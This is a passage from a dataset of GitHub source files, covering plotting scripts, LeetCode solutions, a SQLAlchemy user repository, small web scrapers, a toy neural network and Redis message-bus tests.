1')\nax.plot(x[:1000], g2[:1000], label=r'Group 2')\nax.plot(x[:1000], g3[:1000], label=r'Group 3')\nax.plot(x[:1000], g4[:1000], label=r'Group 4')\nax.plot(x[:1000], g5[:1000], label=r'Group 5')\nax.plot(x[:1000], g6[:1000], label=r'Group 6')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Neutron group flux [# cm$^{-2}$ s$^{-1}$]')\nax.legend()\nplt.savefig('stflux.png', dpi=400)\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], g6[:1000], label=r'Start-up')\nax.plot(x[:1000], g6l[:1000], label=r'Early-life')\nax.plot(x[:1000], g6q[:1000], label=r'Equilibrium')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Neutron group 6 flux [# cm$^{-2}$ s$^{-1}$]')\nax.legend()\nplt.savefig('grp6flux.png', dpi=400)\n","repo_name":"arfc/2019-park-global","sub_path":"data/flux-plotter.py","file_name":"flux-plotter.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} 
+{"seq_id":"1176559233","text":"#\n# @lc app=leetcode.cn id=40 lang=python3\n#\n# [40] 组合总和 II\n#\n\nfrom typing import List\n\n# @lc code=start\n\n\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n nums = sorted(candidates)\n paths = []\n path = []\n self.helper(nums, 0, paths, path, target)\n return paths\n\n def helper(self, nums, start, paths, path, target):\n\n if target < 0:\n return\n\n if target == 0:\n paths.append(path[:])\n return\n\n for i, num in enumerate(nums[start:], start):\n if i > start and num == nums[i-1]:\n continue\n path.append(num)\n self.helper(nums, i+1, paths, path, target-num)\n if len(path) > 0:\n path.pop()\n if target - num < 0:\n break\n\n\nif __name__ == \"__main__\":\n nums = [10, 1, 2, 7, 6, 1, 5]\n target = 8\n\n s = Solution()\n paths = s.combinationSum2(nums, target)\n print(paths)\n\n# @lc code=end\n","repo_name":"labusi/oj-problems","sub_path":"leetcode/python/40.组合总和-ii.py","file_name":"40.组合总和-ii.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41193087943","text":"import FWCore.ParameterSet.Config as cms\n\ntrackerClusterCheckDefault = cms.EDProducer('ClusterCheckerEDProducer',\n doClusterCheck = cms.bool(True),\n MaxNumberOfCosmicClusters = cms.uint32(400000),\n ClusterCollectionLabel = cms.InputTag('siStripClusters'),\n MaxNumberOfPixelClusters = cms.uint32(40000),\n PixelClusterCollectionLabel = cms.InputTag('siPixelClusters'),\n cut = cms.string('strip < 400000 && pixel < 40000 && (strip < 50000 + 10*pixel) && (pixel < 5000 + 0.1*strip)'),\n silentClusterCheck = cms.untracked.bool(False),\n mightGet = cms.optional.untracked.vstring\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"RecoTracker/TkSeedGenerator/trackerClusterCheckDefault_cfi.py","file_name":"trackerClusterCheckDefault_cfi.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6323155937","text":"from enum import unique\nfrom sqlalchemy import Table, Column, Integer, String, ForeignKey, TIMESTAMP\nfrom src.users.entities.user import User\n\nclass SQLAlchemyUsersRepository():\n\n def __init__(self, sqlalchemy_client, test = False):\n\n self.client = sqlalchemy_client\n self.session_factory = sqlalchemy_client.session_factory\n self.test = test\n\n table_name = \"Users\"\n\n if test:\n table_name += \"_test\"\n\n self.users_table = Table(\n table_name,\n sqlalchemy_client.mapper_registry.metadata,\n Column(\"id\", Integer, primary_key = True),\n Column(\"name\", String(50)),\n Column(\"email\", String(255)),\n Column(\"password\", String(255)),\n Column(\"role\", String(25)),\n Column(\"shipping_address\", String(255)),\n Column(\"public_id\", String(50), unique=True),\n )\n\n sqlalchemy_client.mapper_registry.map_imperatively(User, self.users_table)\n\n def get_users(self):\n \n with self.session_factory() as session:\n \n users = session.query(User).all()\n return users\n\n\n def create_user(self, user):\n\n with self.session_factory() as session:\n\n session.add(user)\n session.commit()\n\n return user\n \n def get_user(self, id):\n \n with self.session_factory() as session:\n\n user = session.query(User).filter_by(id = id).first()\n return user\n\n def update_user(self, id, fields):\n \n with self.session_factory() as session:\n\n session.query(User).filter_by(id = id).update(fields)\n session.commit()\n \n user = 
session.query(User).filter_by(id = id).first()\n return user\n\n def get_user_by_email(self, email):\n with self.session_factory() as session:\n\n user = session.query(User).filter_by(email = email).first()\n return user\n\n \n def hard_delete_user(self, id):\n\n with self.session_factory() as session:\n\n user = session.query(User).get(id)\n session.delete(user)\n session.commit()\n\n def hard_delete_all_users(self):\n\n if self.test:\n\n with self.session_factory() as session:\n \n session.query(User).delete()\n session.commit()\n \n def drop_users_table(self):\n\n if self.test:\n self.client.drop_table(self.users_table)","repo_name":"DantexInferno/basic-flask-ecommerce-jwt-auth","sub_path":"ecommerce-service/src/users/repositories/sqlalchemy_users_repository.py","file_name":"sqlalchemy_users_repository.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8959482307","text":"# First solution. Brute force. Correct, but times out.\nclass NumMatrixFirstAttempt(object):\n\n def __init__(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n \"\"\"\n \n self.data = matrix\n \n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n total = 0\n \n for i in range(row1, row2+1):\n for j in range(col1, col2+1):\n total += self.data[i][j]\n \n return total\n\n\nclass NumMatrixImproved(object):\n\n def __init__(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n \"\"\"\n \n y_len = len(matrix) + 1\n x_len = len(matrix[0]) + 1\n \n data = []\n for y in range(y_len):\n data.append([])\n for x in range(x_len):\n data[y].append(0)\n \n self.data = data\n \n for y in range(1,y_len):\n for x in range(1,x_len):\n self.data[y][x] = matrix[y-1][x-1] + self.data[y-1][x] + self.data[y][x-1] - self.data[y-1][x-1]\n \n # print(self.data)\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n \n return self.data[row2+1][col2+1] - self.data[row2+1][col1] - self.data[row1][col2+1] + self.data[row1][col1]","repo_name":"cody-brock/toy-problems","sub_path":"range_sum_query_2d_immutable.py","file_name":"range_sum_query_2d_immutable.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3238048806","text":"# https://leetcode.com/problems/multiply-strings/discuss/17605/Easiest-JAVA-Solution-with-Graph-Explanation\n# This link shows the relationship of index, which is easier to implement.\nclass Solution:\n def multiply(self, num1: str, num2: str) -> str:\n M, N = len(num1), len(num2)\n res = [0 for _ in range(M + N)]\n for i in range(M):\n for j in range(N):\n res[i+j+1] += int(num1[i]) * int(num2[j])\n \n for k in range(len(res)-1, -1, -1):\n if k-1 >= 0:\n res[k-1] += res[k] // 10\n res[k] = str(res[k] % 10)\n \n while len(res) > 1 and res[0] == \"0\":\n res = res[1:]\n return \"\".join(res)","repo_name":"chien-wei/LeetCode","sub_path":"0043_Multiply_Strings.py","file_name":"0043_Multiply_Strings.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12854836339","text":"class Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place 
instead.\n        \"\"\"\n        # Two-pointer sweep: move every non-zero element forward in order;\n        # the original while/swap logic indexed past the array and reordered\n        # the non-zero elements.\n        pos = 0  # next position for a non-zero element\n        for i in range(len(nums)):\n            if nums[i] != 0:\n                nums[pos], nums[i] = nums[i], nums[pos]\n                pos += 1\n\nif __name__ == \"__main__\":\n    a = Solution()\n    nums = [0]\n    a.moveZeroes(nums)","repo_name":"mengyangbai/leetcode","sub_path":"practise/remove_zero.py","file_name":"remove_zero.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20761811638","text":"import numpy as np\nimport math\n\ndef sigmoid(x):\n    z = 1/(1+np.exp(-x))\n    return z\n\ndef sigmoid_derivative(x):\n    z = x*(1-x)\n    return z\n\nclass NeuralNetwork:\n    def __init__(self, x, y):\n        self.input = x\n        self.weights1 = np.random.rand(self.input.shape[1],5)\n        self.weights2 = np.random.rand(5,1)\n        self.y = y\n        self.output = np.zeros(self.y.shape)\n\n\n    def feedforward(self):\n        self.layer1 = sigmoid(np.dot(self.input, self.weights1))\n        self.output = sigmoid(np.dot(self.layer1, self.weights2))\n\n    def backprop(self):\n        matr = 2*(self.y-self.output) * sigmoid_derivative(self.output)\n        abc = np.dot(matr, self.weights2.T)\n        d_weights2 = np.dot(self.layer1.T, matr)\n        d_weights1 = np.dot(self.input.T, abc * sigmoid_derivative(self.layer1))\n        self.weights1 += d_weights1\n        self.weights2 += d_weights2\n    \n    def train(self):\n        for i in range(1,1500):\n            self.feedforward()\n            self.backprop()\n\n\ndef main():\n    x = np.array(([1,1],[0,0],[1,0],[0,1]))\n    y = np.array(([1],[1],[0],[0]))\n    first_instance = NeuralNetwork(x,y)\n    first_instance.train()\n\n\n\n    first_instance.input = np.array([1,1])\n    first_instance.feedforward()\n\n    print(first_instance.output)\nmain()\n\n\n","repo_name":"RedPipper/NeuralStudy","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"17243251358","text":"import pyperclip\nimport urllib.request\nimport webbrowser\nimport os\nimport codecs\nfrom bs4 import BeautifulSoup\n\n####### 1. Download the html given a url\n\n## Get the copied url from the clipboard\nNewsUrl = pyperclip.paste()\n\n# Download the page\nfid=urllib.request.urlopen(NewsUrl)\nhtmlnewsfull=fid.read().decode('utf-8')\n\n####### 2. Scrape the html and keep only the body \n\nsoup = BeautifulSoup(htmlnewsfull, 'html.parser')\ntext = str(soup.find(\"div\", {\"class\": \"body-nota\"}))\n\n\n# string_corte = 'content-top-right'\n\nstring_corte = 'Mirá también'\ntry:\n    texto_final = text[:text.index(string_corte)]\nexcept ValueError:  # str.index raises ValueError when the marker is missing\n    string_corte = 'content-top-right'\n    try:\n        texto_final = text[:text.index(string_corte)]\n    except ValueError:\n        texto_final = text[:text.index(string_corte)]\n\n# texto_final = text[:text.index(string_corte) + len(string_corte)]\n\n####### 3. Write the cleaned body into another html file\n\nf = codecs.open(\"nota.html\", \"w\", \"utf-8\")\nf.write(str(texto_final))\nf.close()\n\n####### 4. Open the html \n\n# url = \"file://d/testdata.html\"\n\nwebbrowser.open_new_tab('nota.html')","repo_name":"acortazzo/NewsScrapper","sub_path":"newsScrapper.py","file_name":"newsScrapper.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18188519915","text":"import datetime\n\nfrom .
 import *\n\ncheck = Method(\"check\")\n# Checks that arguments are of the correct type and in range only.\n\ndef month_number_from_arg(month, error):\n    try:\n        month_number = Months.options[month]\n    except KeyError:\n        error(\n            \"Months should be e.g. Jan/January or numbers \"\n            \"in range 1 to 12, not %s\" % month\n        )\n        return 1\n    else:\n        return month_number\n\n@check.implementation(Months)\ndef Months_check(month_filter):\n    month_filter.errors = []\n    error = month_filter.errors.append\n    month_filter.month_numbers = list()\n    for month in month_filter.months: \n        month_number = month_number_from_arg(month, error) - 1\n        if month_number in month_filter.month_numbers:\n            error(\n                \"%s was added more than once\" % month_sequence[month_number]\n            )\n        month_filter.month_numbers.append(month_number)\n    return month_filter.errors\n\n@check.implementation(FromDate)\ndef FromDate_check(from_date):\n    from_date.errors = []\n    error = from_date.errors.append\n    year = from_date.year\n    month = from_date.month or 1\n    day = from_date.day or 1\n    month_number = month_number_from_arg(month, error)\n    if not isinstance(year, int):\n        error(\"Year should be a whole number\")\n    if not isinstance(day, int):\n        error(\"Day should be a whole number\")\n    if not (1900 < year < 2500):\n        error(\"Year should be in range 1900 to 2500\")\n    try:\n        from_date.date = datetime.date(year, month_number, day)\n    except ValueError:\n        error(\"Invalid date\")\n    return from_date.errors\n\nimport calendar\n\n@check.implementation(ToDate)\ndef ToDate_check(to_date):\n    to_date.errors = []\n    error = to_date.errors.append\n    year = to_date.year\n    month = to_date.month or 1\n    day = to_date.day or -1\n    if not isinstance(year, int):\n        error(\"Year should be a whole number\")\n    if not isinstance(day, int):\n        error(\"Day should be a whole number\")\n    if not (1900 < year < 2500):\n        error(\"Year should be in range 1900 to 2500\")\n    month_number = month_number_from_arg(month, error)\n    if day == -1:\n        # use last day of month\n        _, day = calendar.monthrange(year, month_number)\n    else:\n        day = to_date.day\n    try:\n        to_date.date = datetime.date(year, month_number, day)\n    except ValueError:\n        error(\"Invalid date\")\n    return to_date.errors\n\n@check.implementation(Addition, Subtraction, Multiplication, Division)\ndef Binop_check(binop):\n    binop.errors = []\n    left = check(binop.left)\n    right = check(binop.right)\n    return left or right\n\n@check.implementation(Pow)\ndef PowRoot_check(binop):\n    binop.errors = []\n    error = binop.errors.append\n    exponent = binop.right\n    if not isinstance(exponent, int) or exponent == 0:\n        error(\"Exponent should be a positive, non-zero number.\")\n    return check(binop.left) or binop.errors\n\n@check.implementation(*aggregations)\ndef Aggregation_check(aggregation):\n    aggregation.errors = []\n    def error(message):\n        aggregation.errors.append(message)\n    allowed_specifications = (ToDate, FromDate, Months)\n    specification_errors = False\n    if not isinstance(aggregation.dataset_name, str):\n        error(\"First argument should be the name of a data set enclosed in \"\n            \"parentheses. 
\")\n else:\n if SampleTable.name_exists(aggregation.dataset_name, error):\n aggregation.sample_table = SampleTable.with_name(aggregation.dataset_name)\n for specification in aggregation.specification:\n if not isinstance(specification, allowed_specifications):\n error(\n \"%(specification)s cannot be used inside \"\n \"%(aggregation_name)s(...).\\n\"\n \"Required arguments are table name: %(table_names)s.\\n\"\n \"Optional arguments are %(possibilities)s.\" % dict(\n specification = specification,\n aggregation_name = aggregation.__class__.__name__,\n table_names = \", \".join(\n map(\n '\"%s %s\"'.__mod__,\n climate_sample_tables\n )\n ),\n possibilities = \", \".join(\n Class.__name__+\"(...)\" for Class in allowed_specifications\n )\n )\n )\n specification_errors |= bool(check(specification))\n return aggregation.errors or specification_errors\n\n@check.implementation(Number)\ndef Number_check(positive_number):\n if positive_number.units._positive and positive_number.value < 0:\n positive_number.errors = [\"Affine Numbers must be positive\"]\n else:\n positive_number.errors = []\n return positive_number.errors\n\ncheck_analysis = Method(\"check_analysis\")\n\n@check_analysis.implementation(Number)\ndef Number_check_analysis(number, out):\n out(number.value)\n if number.errors:\n out(\"# ^ \", \", \".join(number.errors))\n\n@check_analysis.implementation(FromDate, ToDate)\ndef FromDate_check_analysis(date_spec, out):\n out(date_spec)\n if date_spec.errors:\n out(\"# ^ \", \", \".join(date_spec.errors))\n\n@check_analysis.implementation(*operations)\ndef Binop_check_analysis(binop, out):\n def indent(*strings):\n out(\" \", *strings)\n\n out(\"(\")\n check_analysis(binop.left, indent)\n\n indent(binop.op)\n \n check_analysis(binop.right, indent)\n out(\")\")\n if binop.errors:\n out(\"# ^ \", \", \".join(binop.errors))\n\n\n@check_analysis.implementation(*aggregations)\ndef aggregation_check_analysis(aggregation, out):\n out(type(aggregation).__name__, \"(\")\n def indent(*strings):\n out(\" \", *strings)\n indent(str(aggregation.sample_table), \",\")\n \n for specification in aggregation.specification:\n check_analysis(specification, indent)\n out(\")\")\n if aggregation.errors:\n out(\"# ^ \", \", \".join(aggregation.errors))\n\n@check_analysis.implementation(int, float)\ndef primitive_number_check_analysis(number, out):\n out(number)\n\n ","repo_name":"openincident/cert","sub_path":"modules/ClimateDataPortal/DSL/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5851050184","text":"from collections import OrderedDict\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\n\n\nclass FCLayer(nn.Module):\n\n def __init__(self, chans_in, chans_out, activation=nn.ReLU):\n super(FCLayer, self).__init__()\n self.fc = nn.Linear(chans_in, chans_out)\n self.act_fn = activation()\n\n def forward(self, x):\n return self.act_fn(self.fc(x))\n\n\nclass GaussianEncoder(nn.Module):\n def __init__(self, inp_dim, hid_dim, z_dim, num_hidden=1):\n super(GaussianEncoder, self).__init__()\n self.input_to_hidden = nn.Linear(inp_dim, hid_dim)\n self.hiddens = None\n if num_hidden > 0:\n self.hiddens = nn.Sequential(OrderedDict([('fc%d' % (l + 1), FCLayer(hid_dim, hid_dim, activation=nn.ReLU))\n for l in range(num_hidden)]))\n self.mu_encode = nn.Linear(hid_dim, z_dim)\n self.logvar_encode = nn.Linear(hid_dim, z_dim)\n\n 
self.relu = nn.ReLU()\n\n    def forward(self, x):\n        h1 = self.relu(self.input_to_hidden(x))\n        if self.hiddens is not None:\n            h1 = self.hiddens(h1)\n        return self.mu_encode(h1), self.logvar_encode(h1)\n\n\nclass Decoder(nn.Module):\n    def __init__(self, inp_dim, hid_dim, z_dim, num_hidden=1):\n        super(Decoder, self).__init__()\n        self.from_z_to_hidden = nn.Linear(z_dim, hid_dim)\n        self.hiddens = None\n        if num_hidden > 0:\n            self.hiddens = nn.Sequential(OrderedDict([('fc%d' % (l+1), FCLayer(hid_dim, hid_dim, activation=nn.ReLU))\n                                                      for l in range(num_hidden)]))\n        self.hidden_to_input = nn.Linear(hid_dim, inp_dim)\n\n        self.sigmoid = nn.Sigmoid()\n        self.relu = nn.ReLU()\n\n    def forward(self, z):\n        h3 = self.relu(self.from_z_to_hidden(z))\n        if self.hiddens is not None:\n            h3 = self.hiddens(h3)\n        return self.sigmoid(self.hidden_to_input(h3))\n\n\nclass GaussianGraphVAE(nn.Module):\n    def __init__(self, num_nodes, enc_cls=GaussianEncoder, dec_cls=Decoder, hid_dim=400, z_dim=20,\n                 enc_kwargs=None, dec_kwargs=None):\n        super(GaussianGraphVAE, self).__init__()\n\n        self.inp_dim = num_nodes**2\n        self.z_dim = z_dim\n\n        if enc_kwargs is None:\n            enc_kwargs = {}\n\n        if dec_kwargs is None:\n            dec_kwargs = {}\n\n        self.encoder = enc_cls(inp_dim=self.inp_dim, hid_dim=hid_dim, z_dim=z_dim, **enc_kwargs)\n        self.decoder = dec_cls(inp_dim=self.inp_dim, hid_dim=hid_dim, z_dim=z_dim, **dec_kwargs)\n\n    def encode(self, x):\n        return self.encoder.forward(x)\n\n    def reparameterize(self, mu, logvar):\n        if self.training:\n            std = logvar.mul(0.5).exp_()\n            eps = Variable(std.data.new(std.size()).normal_())\n            return eps.mul(std).add_(mu)\n        else:\n            return mu\n\n    def decode(self, z):\n        return self.decoder.forward(z)\n\n    def forward(self, x):\n        mu, logvar = self.encode(x.view(-1, self.inp_dim))\n        z = self.reparameterize(mu, logvar)\n        return self.decode(z), mu, logvar\n\n    def loss_function(self, recon_x, x, mu, logvar):\n        BCE = F.binary_cross_entropy(recon_x, x.view(-1, self.inp_dim), size_average=False)\n\n        # see Appendix B from VAE paper:\n        # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014\n        # https://arxiv.org/abs/1312.6114\n        # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n        KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\n        return BCE + KLD","repo_name":"gaxler/comb2vec","sub_path":"comb2vec/models/adjacency_mat_vae.py","file_name":"adjacency_mat_vae.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"41889811386","text":"# Download the file from https://www.dropbox.com/s/sipsmqpw1gwzd37/referat.txt?dl=0\n# Read the file contents into a variable and count the length of the resulting string\n# Count the number of words in the text\n# Replace the periods in the text with exclamation marks\n# Save the result to the file referat2.txt\n\nwith open(\"referat.txt\", \"r\", encoding=\"utf-8\") as referat:\n    referat_symbols_count = 0\n    referat_words_count = 0\n\n    for line in referat:\n        referat_symbols_count += len(line)\n        referat_words_count += len(line.split())\n        line = line.replace('.', '!') \n        with open('referat2.txt', 'a', encoding='utf-8') as referat2: \n            referat2.write(line)\n\n    print(referat_symbols_count) # got 1509, but notepad++ says 2823. 
Which is correct?\n    print(referat_words_count) # matched the count in Word\n","repo_name":"yamike90/learnPython_hw3","sub_path":"working_with_files.py","file_name":"working_with_files.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38320366941","text":"import math\n\n\ndef total_sum(sub):\n    total = 0\n    for item in sub:\n        total += item\n    return total\n\n\ndef max_sum_subarray(arr, k):\n\n    maxSum = -math.inf\n\n    i = 0\n    j = k\n    while j <= len(arr):\n        temp_sum = 0\n        temp_sum = total_sum(arr[i:j])\n        if temp_sum > maxSum:\n            maxSum = temp_sum\n        i += 1\n        j += 1\n\n    return maxSum\n\n\nout = max_sum_subarray([1, 2, 3, 4, 5, 6], 4)\nprint(out)\n","repo_name":"ajaypokharel/dsa_revision","sub_path":"slidWindow/maxSumSubarray.py","file_name":"maxSumSubarray.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9790073738","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 20 22:10:47 2018\n\n@author: profa\n\"\"\"\n\n## nltk examples\nimport nltk\nfrom nltk.tokenize import word_tokenize\n\n\ntext=\"To be or not to be\"\n \ntokens = [t for t in text.split()]\nprint(tokens)\n \nfreq = nltk.FreqDist(tokens)\n \nfor key,val in freq.items():\n    print (str(key) + ':' + str(val))\n\nfreq.plot(20, cumulative=False)\n\nmytext = \"Hiking is dfsd fun! Hiking with dogs is more fun blood-thinner :)\"\nprint(word_tokenize(mytext))\n\n \n#####################################################\n#####################################################\n\n## Let's say we are unhappy with the tokenizer we are using\n## and wish to explicitly identify rules to define tokens\n## Try re and regular expressions!!\n## https://docs.python.org/3.4/library/re.html\n\n#%%\nimport re\nline = \"Lets assume we scrapted some text data from a website or corpus \\\n Lets try to find all of the valid email addresses such as \\\n asdfal2@als.com, Users1@gmail.de \\\n but not Dariush@@dasd-asasdsa.com.lo nor @someDomain.com \\\n what regex could we use ?!?!?!\"\n \nprint(\"\\n\\nword_tokenizer results ... \")\nprint(word_tokenize(line))\nprint(\"\\n\\nre results with regex defined appropriately ... \")\n \nmatch = re.findall(r'[\\w\\.-]+@[\\w\\.-]+', line)\nfor i in match:\n    print(i)\n#%% \n## In-Class Exercise\n## https://docs.python.org/3.4/library/re.html \n##############################################\n############################################## \n##############################################\n\n## Use re to find tokens within a string of the following form.\n## Test on input strings to confirm correctness.\n## State Any Assumptions you may make.\n## 1) Dollar Amounts\n## 2) U.S. 
phone numbers\n## 3) Websites \n##\n##\n##\n    ","repo_name":"boltonvandy/IST736repo","sub_path":"inClassExercises/02_inClassActivity_regularExpressions.py","file_name":"02_inClassActivity_regularExpressions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"1098818239","text":"# Find the index of an element that occurs more than len(A)//2 times in array A\ndef solution(A):\n    n = len(A)\n    size = 0\n    for k in xrange(n):\n        if size == 0:\n            size += 1\n            value = A[k]\n        else:\n            if value != A[k]:\n                size -= 1\n            else:\n                size += 1\n    result = -1\n    count = 0\n    if size > 0:\n        candidate = value\n        for i in xrange(n):\n            if A[i] == candidate:\n                count += 1\n                result = i\n    return result if count > n//2 else -1\n","repo_name":"viktorpi/algorithms","sub_path":"algorithms/leader/dominant.py","file_name":"dominant.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29632129613","text":"import time\n\nfrom allocation import messagebus, services\nfrom allocation.core import commands, events\nfrom allocation.interfaces.database.db import session_factory\nfrom allocation.interfaces.external_bus import create_redis_client\nfrom allocation.unit_of_work import UnitOfWork\nfrom tests.conftest import (\n    make_test_batch,\n    make_test_order_item,\n    make_test_sku,\n    make_test_sku_product_and_batch,\n)\n\n\ndef test_redis_connection():\n    client = create_redis_client()\n    client.set(\"foo\", \"bar\")\n    assert client.get(\"foo\") == b\"bar\"\n\n\ndef test_publish_event_to_redis_channel():\n    client = create_redis_client()\n    batch = make_test_batch(make_test_sku())\n    event = events.BatchQuantityChanged(batch.uuid, 10)\n    client.subscribe_to_channel(type(event))\n    client.publish_channel_message(event)\n    while True:\n        retrieved_event = client.get_channel_message(type(event))\n        if retrieved_event:\n            assert event == retrieved_event\n            break\n\n\ndef test_publish_event_to_redis_channel_via_handler():\n    batch = make_test_batch(make_test_sku())\n    event = events.BatchQuantityChanged(batch.uuid, 10)\n    services.publish_message_to_external_bus(event)\n\n\ndef test_initiate_command_from_external_event():\n    with UnitOfWork(session_factory) as uow:\n        sku, product, batch = make_test_sku_product_and_batch()\n        order_item_1, order_item_2 = make_test_order_item(sku), make_test_order_item(\n            sku\n        )\n        product.allocate(order_item_1)\n        product.allocate(order_item_2)\n        uow.products.add(product)\n        batch_id = batch.uuid\n        sku_id = sku.uuid\n\n    redis_client = create_redis_client()\n    redis_client.subscribe_to_channel(commands.ChangeBatchQuantity)\n    redis_client.subscribe_to_channel(events.OrderItemDeallocated)\n    cmd = commands.ChangeBatchQuantity(sku_id, batch_id, 15)\n    redis_client.publish_channel_message(cmd)\n\n    while True:\n        cmd = redis_client.get_channel_message(commands.ChangeBatchQuantity)\n        if cmd:\n            messagebus.QUEUE.append(cmd)\n            messagebus.handle(messagebus.QUEUE, UnitOfWork(session_factory))\n            break\n        
time.sleep(0.5)\n","repo_name":"yassineayadi/cosmic-python","sub_path":"tests/integration/test_message_broker.py","file_name":"test_message_broker.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19762665001","text":"#CarDekho\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport csv\nurl = 'https://web.archive.org/web/20110924050541/http://www.cardekho.com/search/AllBrands/AllVehicleStyles/AllPriceRanges/Price-Low-High'\npage = requests.get(url)\nsoup = bs(page.content, 'html.parser')\n\ncars = soup.findAll('div', {'class' : 'comparediv'})\n\n# find car brand names\ncars_brand = []\nfor b in soup.findAll('span', {'class': 'vechilediv'}):\n    p = b.text.find('\xa0')\n    brand = b.text[0:p]\n    cars_brand.append(brand.strip())\nresults = []\nfor car in cars:\n    titles = car.findAll('div', {'class':'widthfiftyfour leftfloat'})\n    prices = car.findAll('div', {'class':'pricereal'})\n    # r = {}\n    for t in range(len(titles)):\n        title = titles[t].text.strip()\n        price = prices[t].find('span').text\n        for car_brand in cars_brand:\n            if title.find(car_brand) != -1:\n                brand = car_brand\n        car_model = title.replace(brand,'').strip()\n        r = {'Brand' : brand, 'Car Model': car_model, 'Price': price}\n        results.append(r)\ncsv_columns = ['Brand', 'Car Model', 'Price']\ncsv_file = 'results.csv'\nwith open(csv_file, 'w', newline='', encoding='utf-8') as f:\n    writer = csv.DictWriter(f, fieldnames=csv_columns)\n    writer.writeheader()\n    for data in results:\n        writer.writerow(data)","repo_name":"khubah/Scraping-Portfolio","sub_path":"scrape-archiveOrg/CarDekho.py","file_name":"CarDekho.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38748171089","text":"# Type Conversion\nimport string\n\n\nx = 10\ny = 3.14\nz = \"20\"\n\n# \"20\" => 20\n# string => float(number)\nz=float(z)\n\nz=z+50\nprint (z)\n\n# float(number) => string\nz=str(z)\n\nprint(type(z))","repo_name":"wanloparu/AI","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13411763180","text":"from django import template\r\nimport math\r\nregister = template.Library()\r\n\r\n\r\n@register.simple_tag\r\ndef discount_calculation(price,discount):\r\n    if discount is None or discount == 0:\r\n        return price\r\n    sellprice = price\r\n    sellprice = price - (price * discount/100)\r\n    return math.floor(sellprice)","repo_name":"Manjothub/Learning-Management-System","sub_path":"Home/templatetags/course_tags.py","file_name":"course_tags.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"31262807741","text":"import httplib\nimport json\nimport sys\nimport time\n\nfrom lib import error\nfrom lib import http_interface\nfrom lib import utils\n\n\nclass UserSubmission(object):\n  \"\"\"A submission for a problem input, including result and timestamp.\"\"\"\n  # There are two statuses that are treated in a special way:\n  #\n  # - Submitted: This status is assigned to submissions for inputs for which the\n  #   judgement is not yet available. We optimistically consider Submitted\n  #   inputs to be correct.\n  #\n  # - Correct (+4 minutes): This status marks a solution as correct but also\n  #   adds a 4 minute penalty. 
